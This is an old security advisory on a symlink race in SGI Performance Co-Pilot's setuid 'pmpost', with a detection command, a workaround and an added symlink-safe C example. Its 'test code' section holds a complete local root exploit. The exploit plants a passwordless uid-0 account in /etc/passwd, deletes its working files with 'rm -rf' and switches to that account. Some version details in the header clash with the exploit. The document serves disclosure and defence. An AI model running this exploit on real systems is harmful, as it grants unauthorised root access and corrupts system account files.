SGI Performance Co-Pilot pmpost symbolic link vulnerability

Published: 2001-06-22
Updated: 2001-06-22
Severity: High
Threat level: Local administrator privileges
Error type: Race condition
Exploitation mode: Server mode

Affected systems

SGI Performance Co-Pilot 2.2

Detailed description

Performance Co-Pilot (PCP) is a suite of services that supports system-level performance monitoring. It was originally an IRIX product, and SGI has since released the source code. One of the PCP tools, 'pmpost', is generally installed setuid root by default. When it writes the 'NOTICES' file into its user-defined LOG directory, 'pmpost' is open to a symbolic link attack. Because the data written is supplied by the user, it is possible to gain root privileges.

To test whether an IRIX system is vulnerable, you can run the following command:

    strings /usr/pcp/bin/pmpost | grep PCP_LOG_DIR

If 'PCP_LOG_DIR' is displayed, 'pmpost' has this vulnerability.

Test code

    /********************************************************
     *                                                      *
     *   pmpost local root exploit                          *
     *   vulnerable: pcp <= 2.1.11-5                        *
     *   by IhaQueR                                         *
     *                                                      *
     ********************************************************/

    #include <stdio.h>
    #include <stdlib.h>
    #include <time.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/wait.h>
    #include <fcntl.h>
    #include <sys/stat.h>

    int main(void)
    {
        const char *bin = "/usr/share/pcp/bin/pmpost";
        static char buf[512];
        static char dir[128];

        /* private working directory that will serve as the "log directory" */
        srand(time(NULL));
        sprintf(dir, "/tmp/dupa.%.8d", rand());

        if (mkdir(dir, S_IRWXU))
            _exit(2);

        if (chdir(dir))
            _exit(3);

        /* NOTICES in that directory is a symlink to the target file */
        if (symlink("/etc/passwd", "./NOTICES"))
            _exit(4);

        /* point pmpost at the directory through the environment */
        snprintf(buf, sizeof(buf) - 1, "PCP_LOG_DIR=%.500s", dir);

        if (putenv(buf))
            _exit(5);

        if (!fork()) {
            /* child: the setuid pmpost appends the supplied text to NOTICES */
            execl(bin, bin, "\nr00t::0:0:root:/root:/bin/bash", NULL);
            _exit(1);
        } else {
            /* parent: wait for pmpost, clean up, then switch user */
            waitpid(0, NULL, WUNTRACED);
            chdir("..");
            sprintf(buf, "rm -rf dupa.*");
            system(buf);
            execl("/bin/su", "/bin/su", "r00t", NULL);
        }
        return 0;
    }

Solution

A temporary workaround is to remove the setuid bit from 'pmpost'.

Alternatively, download the latest version, 2.2.1-3:

SGI Performance Co-Pilot 2.2:
    SGI upgrade Performance Co-Pilot 2.2.1-3
    http://oss.sgi.com/projects/pcp/download/pcp-2.2.1.tar.gz
SGI Performance Co-Pilot 2.1.9:
    SGI upgrade Performance Co-Pilot 2.2.1-3
    http://oss.sgi.com/projects/pcp/download/pcp-2.2.1.tar.gz
SGI Performance Co-Pilot 2.1.8:
    SGI upgrade Performance Co-Pilot 2.2.1-3
    http://oss.sgi.com/projects/pcp/download/pcp-2.2.1.tar.gz
SGI Performance Co-Pilot 2.1.7:
    SGI upgrade Performance Co-Pilot 2.2.1-3
    http://oss.sgi.com/projects/pcp/download/pcp-2.2.1.tar.gz
SGI Performance Co-Pilot 2.1.6:
    SGI upgrade Performance Co-Pilot 2.2.1-3
    http://oss.sgi.com/projects/pcp/download/pcp-2.2.1.tar.gz
SGI Performance Co-Pilot 2.1.5:
    SGI upgrade Performance Co-Pilot 2.2.1-3
    http://oss.sgi.com/projects/pcp/download/pcp-2.2.1.tar.gz
SGI Performance Co-Pilot 2.1.4:
    SGI upgrade Performance Co-Pilot 2.2.1-3
    http://oss.sgi.com/projects/pcp/download/pcp-2.2.1.tar.gz
SGI Performance Co-Pilot 2.1.3:
    SGI upgrade Performance Co-Pilot 2.2.1-3
    http://oss.sgi.com/projects/pcp/download/pcp-2.2.1.tar.gz
SGI Performance Co-Pilot 2.1.2:
    SGI upgrade Performance Co-Pilot 2.2.1-3
    http://oss.sgi.com/projects/pcp/download/pcp-2.2.1.tar.gz
SGI Performance Co-Pilot 2.1.11:
    SGI upgrade Performance Co-Pilot 2.2.1-3
    http://oss.sgi.com/projects/pcp/download/pcp-2.2.1.tar.gz
SGI Performance Co-Pilot 2.1.10:
    SGI upgrade Performance Co-Pilot 2.2.1-3
    http://oss.sgi.com/projects/pcp/download/pcp-2.2.1.tar.gz
SGI Performance Co-Pilot 2.1.1:
    SGI upgrade Performance Co-Pilot 2.2.1-3
    http://oss.sgi.com/projects/pcp/download/pcp-2.2.1.tar.gz
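
A symlink-safe way for a privileged logger to append to a NOTICES file, given here as an added example: it is not code from the original advisory or from PCP, and it is not the actual 2.2.1-3 fix. `append_notice` and `demo_case` are hypothetical names, and the demo works only in a constructed temporary directory with a stand-in victim file.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Append msg to <dir>/NOTICES without following symlinks (hypothetical helper).
 * Returns 0 on success, -1 if the target is refused or the write fails. */
int append_notice(const char *dir, const char *msg) {
    struct stat st;
    int rc = -1;
    /* Pin the directory once; O_NOFOLLOW rejects a symlink as its last component. */
    int dfd = open(dir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    if (dfd < 0) return -1;
    /* With O_NOFOLLOW, openat() fails with ELOOP if NOTICES is a symlink. */
    int fd = openat(dfd, "NOTICES", O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW, 0644);
    close(dfd);
    if (fd < 0) return -1;
    /* Check the object actually opened: a regular file with a single link. */
    if (fstat(fd, &st) == 0 && S_ISREG(st.st_mode) && st.st_nlink == 1 &&
        write(fd, msg, strlen(msg)) == (ssize_t)strlen(msg))
        rc = 0;
    close(fd);
    return rc;
}

/* Constructed demo: fresh temp dir, optionally with NOTICES planted as a symlink to a
 * stand-in victim file. Returns append_notice()'s result; -2 on setup failure or if victim changed. */
int demo_case(int plant_symlink) {
    char dir[] = "/tmp/notices-demo.XXXXXX", victim[64], notices[64];
    struct stat st;
    if (!mkdtemp(dir)) return -2;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(notices, sizeof notices, "%s/NOTICES", dir);
    int vfd = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (vfd < 0 || close(vfd) != 0) return -2;
    if (plant_symlink && symlink(victim, notices) != 0) return -2;
    int rc = append_notice(dir, "constructed notice line\n");
    if (stat(victim, &st) != 0 || st.st_size != 0) rc = -2;
    unlink(notices); unlink(victim); rmdir(dir);
    return rc;
}

int main(void) {
    printf("symlink planted: %d, clean directory: %d\n", demo_case(1), demo_case(0));
    return 0;
}
```

O_NOFOLLOW only protects the final path component, so a setuid program should also ignore a caller-supplied PCP_LOG_DIR or drop privileges before opening the file.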